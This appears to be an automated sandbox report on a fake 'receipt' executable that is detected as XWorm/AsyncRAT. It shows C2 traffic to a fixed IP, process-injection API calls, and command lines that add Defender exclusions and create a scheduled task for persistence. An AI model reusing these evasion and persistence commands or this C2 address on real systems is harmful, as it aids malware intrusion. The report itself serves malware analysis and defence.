              Dec 24, 2024 11:30:37.562776089 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.642142057 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.643551111 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:37.754785061 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.763078928 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.763343096 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:37.876730919 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.882903099 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.882997990 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:37.946614981 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:37.996859074 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:38.002567053 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:38.002672911 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:38.122289896 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:38.337340117 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:38.456866980 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:38.735990047 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:38.737478971 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:38.856988907 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:41.743418932 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:41.862850904 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:42.220835924 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:42.224585056 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:42.344028950 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:42.432879925 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:42.552320004 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:42.900892973 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:42.909048080 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:43.028569937 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:51.665287018 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:51.784821033 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:52.125722885 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:52.129017115 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:52.248620033 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:52.977881908 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:53.097578049 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:53.097697020 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:53.217309952 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:53.346873045 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:53.348716021 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:53.468254089 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:53.547373056 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:53.549067974 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:53.668612003 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:53.696461916 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:53.815953970 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:54.158190966 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:54.162909031 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:54.282397032 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:58.259129047 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:58.378782034 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:58.641803026 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:30:58.643299103 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:30:58.763344049 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:31:04.360023022 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:31:04.415060997 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:31:06.167897940 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:31:06.287348032 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:31:06.579488993 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:31:06.582926035 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:31:06.702656031 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:31:10.180875063 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:31:10.308480024 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:31:10.562880993 CET520049710172.245.244.69192.168.2.5
              Dec 24, 2024 11:31:10.563869953 CET497105200192.168.2.5172.245.244.69
              Dec 24, 2024 11:31:10.689730883 CET520049710172.245.244.69192.168.2.5

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:05:27:01
              Start date:24/12/2024
              Path:C:\Users\user\Desktop\Recaipt202431029.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\Recaipt202431029.exe"
              Imagebase:0x170000
              File size:752'128 bytes
              MD5 hash:7B8044F78E70383A436EBBAE2DF47808
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              General

              Target ID:3
              Start time:05:27:03
              Start date:24/12/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Recaipt202431029.exe"
              Imagebase:0xc10000
              File size:433'152 bytes
              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:4
              Start time:05:27:03
              Start date:24/12/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6d64d0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:5
              Start time:05:27:03
              Start date:24/12/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"
              Imagebase:0xc10000
              File size:433'152 bytes
              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:6
              Start time:05:27:03
              Start date:24/12/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6d64d0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:7
              Start time:05:27:03
              Start date:24/12/2024
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmp912F.tmp"
              Imagebase:0xb50000
              File size:187'904 bytes
              MD5 hash:48C2FE20575769DE916F48EF0676A965
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:8
              Start time:05:27:04
              Start date:24/12/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6d64d0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:9
              Start time:05:27:04
              Start date:24/12/2024
              Path:C:\Users\user\Desktop\Recaipt202431029.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\Recaipt202431029.exe"
              Imagebase:0xc10000
              File size:752'128 bytes
              MD5 hash:7B8044F78E70383A436EBBAE2DF47808
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.4558767346.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:false

              General

              Target ID:10
              Start time:05:27:05
              Start date:24/12/2024
              Path:C:\Users\user\AppData\Roaming\JvkAPBBIe.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\JvkAPBBIe.exe
              Imagebase:0x810000
              File size:752'128 bytes
              MD5 hash:7B8044F78E70383A436EBBAE2DF47808
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2181051292.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2181051292.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 100%, Joe Sandbox ML
              • Detection: 68%, ReversingLabs
              Reputation:low
              Has exited:true

              General

              Target ID:11
              Start time:05:27:07
              Start date:24/12/2024
              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Imagebase:0x7ff6ef0c0000
              File size:496'640 bytes
              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
              Has elevated privileges:true
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:12
              Start time:05:27:10
              Start date:24/12/2024
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\JvkAPBBIe" /XML "C:\Users\user\AppData\Local\Temp\tmpA553.tmp"
              Imagebase:0xb50000
              File size:187'904 bytes
              MD5 hash:48C2FE20575769DE916F48EF0676A965
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:13
              Start time:05:27:10
              Start date:24/12/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6d64d0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:14
              Start time:05:27:10
              Start date:24/12/2024
              Path:C:\Users\user\AppData\Roaming\JvkAPBBIe.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Roaming\JvkAPBBIe.exe"
              Imagebase:0x8d0000
              File size:752'128 bytes
              MD5 hash:7B8044F78E70383A436EBBAE2DF47808
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Has exited:true

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:10.4%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:0%
                Total number of Nodes:50
                Total number of Limit Nodes:1
                execution_graph 75256 6d1cec0 75257 6d1cec7 VirtualAllocEx 75256->75257 75258 6d1ce58 Wow64SetThreadContext 75256->75258 75261 6d1cf45 75257->75261 75259 6d1ce7d 75258->75259 75262 6d1cd40 75263 6d1cd80 ResumeThread 75262->75263 75265 6d1cdb1 75263->75265 75270 6d1d210 75271 6d1d299 CreateProcessA 75270->75271 75273 6d1d45b 75271->75273 75248 b6b330 75251 b6b417 75248->75251 75249 b6b33f 75252 b6b45c 75251->75252 75253 b6b439 75251->75253 75252->75249 75253->75252 75254 b6b660 GetModuleHandleW 75253->75254 75255 b6b68d 75254->75255 75255->75249 75299 b6d6c0 75300 b6d706 75299->75300 75304 b6d890 75300->75304 75307 b6d8a0 75300->75307 75301 b6d7f3 75305 b6d8ce 75304->75305 75310 b6b314 75304->75310 75305->75301 75308 b6b314 DuplicateHandle 75307->75308 75309 b6d8ce 75308->75309 75309->75301 75311 b6d908 DuplicateHandle 75310->75311 75312 b6d99e 75311->75312 75312->75305 75266 6d1d078 75267 6d1d0c3 ReadProcessMemory 75266->75267 75269 6d1d107 75267->75269 75274 6d1cf88 75275 6d1cfd0 WriteProcessMemory 75274->75275 75277 6d1d027 75275->75277 75278 b64668 75279 b6467a 75278->75279 75280 b64686 75279->75280 75282 b64779 75279->75282 75283 b6479d 75282->75283 75287 b64888 75283->75287 75291 b64878 75283->75291 75288 b648af 75287->75288 75289 b6498c 75288->75289 75295 b644b0 75288->75295 75293 b648af 75291->75293 75292 b6498c 75292->75292 75293->75292 75294 b644b0 CreateActCtxA 75293->75294 75294->75292 75296 b65918 CreateActCtxA 75295->75296 75298 b659db 75296->75298

                Executed Functions

                Function 06888C78 Relevance: 27.5, Strings: 21, Instructions: 1234COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: $eq$,aq$,aq$4c]q$4c]q$heq$heq$heq$|b^q$|b^q$|b^q$$]q$$]q$$]q$;($[0$c]q$c]q$c]q$c]q$k0
                • API String ID: 0-1774614325
                • Opcode ID: b2d677cd1ffa03988c0dcd742715f2a5bdf5a1b79c3114b4e9a01f6bab923d42
                • Instruction ID: e49ea4fdc22fcba9e3d4d859bf08f0360cd48a85e1e03fb100de91248f58cb52
                • Opcode Fuzzy Hash: b2d677cd1ffa03988c0dcd742715f2a5bdf5a1b79c3114b4e9a01f6bab923d42
                • Instruction Fuzzy Hash: 4FB23474B002148FCB64EF29C994A69BBF6FF88300F1585A9E50ADB365DB34EC81CB51
                Function 068858C0 Relevance: 5.6, Strings: 4, Instructions: 564COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1345 68858c0-6885920 1348 68859f1-68859fb 1345->1348 1349 6885926-688592f 1345->1349 1352 68859fd-6885a06 1348->1352 1353 6885a07-6885a0b 1348->1353 1350 6885c68-6885cb4 1349->1350 1351 6885935-6885940 1349->1351 1362 6885fa8-6885faa 1350->1362 1363 6885cba 1350->1363 1354 68859e1-68859eb 1351->1354 1355 6885946-688596d 1351->1355 1356 6885a11-6885a3d 1353->1356 1357 6885c32-6885c4e 1353->1357 1354->1348 1354->1349 1506 688596f call 68858b0 1355->1506 1507 688596f call 68858c0 1355->1507 1389 6885c2f 1356->1389 1390 6885a43-6885a49 1356->1390 1504 6885c50 call 6886930 1357->1504 1505 6885c50 call 6886940 1357->1505 1364 6885fad-6885fb7 1362->1364 1363->1362 1365 6885ce8-6885d06 1363->1365 1366 6885d5b-6885d79 1363->1366 1367 6885f3c-6885f57 1363->1367 1368 6885dce-6885de2 1363->1368 1369 6885e9e-6885eb3 1363->1369 1370 6885e20-6885e39 1363->1370 1371 6885cc1-6885cd1 1363->1371 1372 6885e11-6885e1b 1363->1372 1373 6885cd6-6885ce3 1363->1373 1397 6885d08-6885d0a 1365->1397 1398 6885d0c 1365->1398 1403 6885d7b-6885d7d 1366->1403 1404 6885d7f 1366->1404 1407 6885f59-6885f5b 1367->1407 1408 6885f5d 1367->1408 1374 6885de8-6885deb 1368->1374 1375 6885fba-6885fbf 1368->1375 1395 6885eb9 1369->1395 1396 6885eb5-6885eb7 1369->1396 1400 6885e3b-6885e3d 1370->1400 1401 6885e3f 1370->1401 1371->1364 1372->1364 1373->1364 1382 6885ded-6885dfa 1374->1382 1383 6885dff-6885e0c 1374->1383 1376 6885c56-6885c67 1377 6885975-6885977 1387 68859a8-68859b1 1377->1387 1388 6885979-688597d 1377->1388 1382->1364 1383->1364 1393 68859bc-68859bf 1387->1393 1394 68859b3-68859ba 1387->1394 1388->1387 1405 688597f-68859a1 1388->1405 1389->1357 1406 6885a4c-6885a57 1390->1406 1411 68859c6-68859d4 1393->1411 1394->1393 1409 68859c1-68859c3 1394->1409 1412 6885ebc-6885ee6 1395->1412 1396->1412 1413 6885d0f-6885d2e 1397->1413 1398->1413 1416 6885e42-6885e6d 1400->1416 1401->1416 1417 6885d82-6885dc9 1403->1417 1404->1417 1405->1387 1406->1350 1418 6885a5d-6885a62 1406->1418 1419 6885f60-6885fa6 1407->1419 1408->1419 1409->1411 1411->1350 1420 68859da-68859de 1411->1420 1438 6885ee8-6885eea 1412->1438 1439 6885eec 1412->1439 1502 6885d30 call 6885ff0 1413->1502 1503 6885d30 call 6886000 1413->1503 1416->1375 1440 6885e73-6885e99 1416->1440 1417->1364 1422 6885a68-6885a6e 1418->1422 1423 6885c20-6885c29 1418->1423 1419->1364 1420->1354 1422->1350 1428 6885a74-6885a7d 1422->1428 1423->1389 1423->1406 1428->1350 1431 6885a83-6885a8e 1428->1431 1431->1423 1442 6885a94-6885aa7 1431->1442 1444 6885eef-6885f3a 1438->1444 1439->1444 1440->1364 1442->1350 1446 6885aad-6885abf 1442->1446 1444->1364 1445 6885d36-6885d56 1445->1364 1449 6885ad0-6885ad3 1446->1449 1450 6885ac1-6885ac4 1446->1450 1456 6885aef-6885af8 1449->1456 1457 6885ad5-6885ad8 1449->1457 1454 6885adf-6885ae5 1450->1454 1455 6885ac6-6885ac9 1450->1455 1465 6885b03-6885b0f 1454->1465 1460 6885acb 1455->1460 1461 6885ae7-6885aed 1455->1461 1456->1465 1463 6885afa-6885b00 1457->1463 1464 6885ada 1457->1464 1460->1423 1461->1465 1463->1465 1464->1423 1469 6885c09-6885c0d 1465->1469 1470 6885b15-6885b18 1465->1470 1469->1423 1471 6885c0f-6885c19 1469->1471 1472 6885b1b-6885b23 1470->1472 1471->1423 1472->1350 1474 6885b29-6885b2e 1472->1474 1475 6885bff-6885c03 1474->1475 1476 6885b34-6885b3d 1474->1476 1475->1469 1475->1472 1476->1350 1478 6885b43-6885b4e 1476->1478 1478->1475 1481 6885b54-6885b5a 1478->1481 1481->1350 1482 6885b60-6885b6f 1481->1482 1484 6885b7d-6885b8d 1482->1484 1485 6885b71-6885b78 1482->1485 1484->1350 1486 6885b93-6885ba2 1484->1486 1485->1475 1487 6885bb0-6885bb3 1486->1487 1488 6885ba4-6885ba7 1486->1488 1489 6885bc9-6885bcf 1487->1489 1490 6885bb5-6885bb8 1487->1490 1491 6885ba9-6885bac 1488->1491 1492 6885bbc-6885bbf 1488->1492 1495 6885bd7-6885bda 1489->1495 1493 6885bba 1490->1493 1494 6885bd1-6885bd4 1490->1494 1496 6885bae 1491->1496 1497 6885bc1-6885bc7 1491->1497 1492->1495 1493->1475 1494->1495 1498 6885bea-6885bf8 1495->1498 1499 6885bdc-6885be2 1495->1499 1496->1475 1497->1495 1498->1475 1499->1498 1500 6885be4-6885be8 1499->1500 1500->1475 1500->1498 1502->1445 1503->1445 1504->1376 1505->1376 1506->1377 1507->1377
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: LR]q$LR]q$LR]q$LR]q
                • API String ID: 0-453796159
                • Opcode ID: 6fe97c23a4e7a3144da31e7fb8df63af8d6fe890cc7fe0b6a24874cbdf22627d
                • Instruction ID: c14b1e3c270fc136b70f9066c0425c1fd1dada92a9c5ef445e9eca812526e630
                • Opcode Fuzzy Hash: 6fe97c23a4e7a3144da31e7fb8df63af8d6fe890cc7fe0b6a24874cbdf22627d
                • Instruction Fuzzy Hash: 45324A34A002099FDB88EF59D484AAEBBF2FF48304F148559E506EB365D770ED81CB92
                Function 06D1CF80 Relevance: 3.1, APIs: 2, Instructions: 103memoryinjectionCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1560 6d1cf80-6d1cf85 1561 6d1cf87-6d1cfd6 1560->1561 1562 6d1cf18 1560->1562 1568 6d1cfe6-6d1d025 WriteProcessMemory 1561->1568 1569 6d1cfd8-6d1cfe4 1561->1569 1563 6d1cf26-6d1cf43 VirtualAllocEx 1562->1563 1564 6d1cf1a-6d1cf21 1562->1564 1565 6d1cf45-6d1cf4b 1563->1565 1566 6d1cf4c-6d1cf71 1563->1566 1564->1563 1565->1566 1574 6d1d027-6d1d02d 1568->1574 1575 6d1d02e-6d1d05e 1568->1575 1569->1568 1574->1575
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D1CF36
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D1D018
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: AllocMemoryProcessVirtualWrite
                • String ID:
                • API String ID: 645232735-0
                • Opcode ID: 7b2504730311c638b2e029ff0b09e80c8afb4664fbad394eddcf05e4e6adc807
                • Instruction ID: b25c4cbe4c31ddbecf0d248287945df5157fea3abc2109488b9a76361a6d8088
                • Opcode Fuzzy Hash: 7b2504730311c638b2e029ff0b09e80c8afb4664fbad394eddcf05e4e6adc807
                • Instruction Fuzzy Hash: 954147B18003499FCB10DFAAD884BEEBBF1FF48310F10842AE559A7251C7B99945CBA1
                Function 0850F698 Relevance: 2.0, Strings: 1, Instructions: 720COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: $]q
                • API String ID: 0-1007455737
                • Opcode ID: 57d10d20ffdc75e2bf8bcc0aaf7d3a8b62f6840e1397abefc40f9b98c4f3de8b
                • Instruction ID: c9cac6450e7038a8fbbe7bd9473dcda2e9e3ab5ef476ffbe830603d29ffc6f41
                • Opcode Fuzzy Hash: 57d10d20ffdc75e2bf8bcc0aaf7d3a8b62f6840e1397abefc40f9b98c4f3de8b
                • Instruction Fuzzy Hash: 0C429D34B042159FCB259F68D854AAEBBA6FF88701F148529E906DB3D5CF34DC82CB91
                Function 08505FD8 Relevance: 1.8, Strings: 1, Instructions: 518COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: $]q
                • API String ID: 0-1007455737
                • Opcode ID: ebda1bf2242fcc5402714f19321455aa1f92fd057b39d59f6ba5627f8c059bf1
                • Instruction ID: e6a5115b8ea751b895379240da948097bccb2b1b4a1e7afe56f15372cadae1a5
                • Opcode Fuzzy Hash: ebda1bf2242fcc5402714f19321455aa1f92fd057b39d59f6ba5627f8c059bf1
                • Instruction Fuzzy Hash: AD125D34B006158FCB14DF68C594AAEBBF6FF88701B158569D906EB3A5DB34EC42CB90
                Function 00B63E28 Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: Pq]q
                • API String ID: 0-2540548202
                • Opcode ID: 4ad085572b68695b0d122729d5a3172264e669f37dc14a1d3b7df24f62d6fa1a
                • Instruction ID: 8c3f3601a4c62337127524286f2b115a928443451c9205e3713d6e14650e247f
                • Opcode Fuzzy Hash: 4ad085572b68695b0d122729d5a3172264e669f37dc14a1d3b7df24f62d6fa1a
                • Instruction Fuzzy Hash: F8D1B274E002188FDB54DFA9D994A9DBBF2FF88300F1085A9D809A7365DB34AD86CF51
                Function 00B67019 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: Pq]q
                • API String ID: 0-2540548202
                • Opcode ID: 0ba4348d62c4c0e942fae97358f6e5468ee31b5226bafad635cc62f73842084f
                • Instruction ID: 9a14f2d650b87509c5993544034a567d8d4e3cf6237f454c2516596aad9049f8
                • Opcode Fuzzy Hash: 0ba4348d62c4c0e942fae97358f6e5468ee31b5226bafad635cc62f73842084f
                • Instruction Fuzzy Hash: D5B1A374E012188FDB54DFA9D994A9DBBF2FF88304F1085A9D409AB365DB309D46CF50
                Function 06C70E78 Relevance: .6, Instructions: 641COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 51915b67664caafada6331ad980817a7bdb2707f7490d4530de3accad7c8ae13
                • Instruction ID: 26f12dbdbbcff868ea0e4b1d950cafb2592289e55c16c4776b4e5af68f47102e
                • Opcode Fuzzy Hash: 51915b67664caafada6331ad980817a7bdb2707f7490d4530de3accad7c8ae13
                • Instruction Fuzzy Hash: F7424770A002448FDB54EF68C594A6EBBF6EF88300F19846DE506DB7A6DB34ED45CB90
                Function 06884690 Relevance: .6, Instructions: 629COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ac431810f1b6087f83615493207de0e3e24bc9b6d9619dedb033a153819736e0
                • Instruction ID: 82c2b7a3adc5451d73b543c531bca58047590a67aa24abd1cda892121c3eb88e
                • Opcode Fuzzy Hash: ac431810f1b6087f83615493207de0e3e24bc9b6d9619dedb033a153819736e0
                • Instruction Fuzzy Hash: 5A425832A00302CFDB65EF69D54866EB7F6FF84315F148869D242CB2A5DB35E885CB50
                Function 06885058 Relevance: .5, Instructions: 505COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
